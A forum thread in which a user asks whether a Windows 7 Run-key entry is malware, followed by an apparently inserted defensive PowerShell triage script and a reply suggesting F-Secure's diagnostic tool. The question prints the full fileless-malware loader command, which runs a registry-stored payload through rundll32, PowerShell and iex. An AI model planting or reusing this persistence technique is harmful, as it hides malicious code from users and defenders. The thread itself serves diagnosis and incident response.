Today I discovered a Windows 7 workstation that, during user access, was starting a strange PowerShell script.
Looking in the Run key of the registry I saw this string:
"cmstsitf"="rundll32 shell32.dll,ShellExec_RunDLL \"cmd\" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\\Software\\AppDataLow\\Software\\Microsoft\\9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F').chsbWNet))"
Looking in the registry key 9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F I see this data.
(The byte data is much longer.)
Could it be some kind of malware?
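One way to triage the pattern in the question (a Run entry that pulls bytes out of another registry value, ASCII-decodes them and hands them to iex) is to enumerate the Run keys, flag entries carrying those indicators, and dump the referenced bytes to a text file for inspection without executing them. This is an added example, not code from the post or from F-Secure; the indicator list and the output folder under $env:TEMP are assumptions.

```powershell
# Added triage script (not from the original post). Lists Run-key entries, flags
# those that look like the entry above, and decodes any registry-stored payload
# they reference to a text file. Nothing from the registry is executed.
$runKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
)
# Indicators taken from the command line in the question (assumed list).
$indicators = 'rundll32', 'ShellExec_RunDLL', 'powershell', 'iex', 'Get-ItemProperty', 'AppDataLow'
$outDir = Join-Path $env:TEMP 'runkey-triage'   # assumed output location
New-Item -ItemType Directory -Path $outDir -Force | Out-Null

foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $item = Get-Item $key
    foreach ($name in $item.GetValueNames()) {
        $cmd  = [string]$item.GetValue($name)
        $hits = $indicators | Where-Object { $cmd -match [regex]::Escape($_) }
        if (-not $hits) { continue }
        Write-Output "[SUSPECT] $key\$name"
        Write-Output "  command : $cmd"
        Write-Output "  matched : $($hits -join ', ')"
        # Extract the key path and value name the command reads, i.e. the
        # (Get-ItemProperty '<path>').<valuename> part, and decode it ourselves.
        if ($cmd -match "Get-ItemProperty\s+'([^']+)'\)\.(\w+)") {
            $payloadKey  = $Matches[1] -replace '\\\\', '\'   # collapse doubled backslashes if present
            $payloadName = $Matches[2]
            if (Test-Path $payloadKey) {
                $raw = (Get-Item $payloadKey).GetValue($payloadName)
                if ($raw -is [byte[]]) {
                    $decoded = [System.Text.Encoding]::ASCII.GetString($raw)
                    $file = Join-Path $outDir ("$name-$payloadName.txt")
                    Set-Content -Path $file -Value $decoded
                    Write-Output "  payload : $($raw.Length) bytes from $payloadKey\$payloadName, decoded to $file"
                } else {
                    Write-Output "  payload : $payloadKey\$payloadName is not REG_BINARY data"
                }
            } else {
                Write-Output "  payload : $payloadKey not found"
            }
        }
    }
}
```

The decoded text file is what to hand to the vendor or read through yourself; the Run value and the payload key should both be preserved before any cleanup so the persistence chain can be reconstructed.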
I think you should use the built-in "F-Secure Support Tool" diagnostics on the computer, either through local run or activated remotely via centralized management and submit the resulting FSDIAG compressed file to F-Secure tech support. That often allows them to find out what's going on, even if an outright binary sample of the suspected malware cannot be located.
Best Regards: Tamas Feher, Hungary.